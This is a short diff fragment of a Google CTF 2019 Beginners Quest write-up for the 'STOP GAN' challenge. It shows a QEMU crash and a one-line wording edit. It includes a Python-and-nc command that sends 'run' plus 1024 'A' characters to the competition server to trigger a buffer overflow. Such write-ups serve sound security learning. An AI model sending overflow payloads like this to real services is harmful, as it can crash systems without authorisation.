konelav/writeups/GoogleCTF2019-BQ/Day4.STOP.GAN.md

     qemu-mipsel: /build/qemu-DqynNa/qemu-2.8+dfsg/translate-all.c:175: tb_lock: Assertion `!have_tb_lock' failed.
     Segmentation fault

-And now we should send it to the given address (not to forget prepend trash with 'run' command for `console` program):
+And now we should send it to the given address (do not forget prepend trash with 'run' command for `console` wrapper):

     $ python -c "print('run\n'+'A'*1024)" | nc buffer-overflow.ctfcompetition.com 1337
     Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.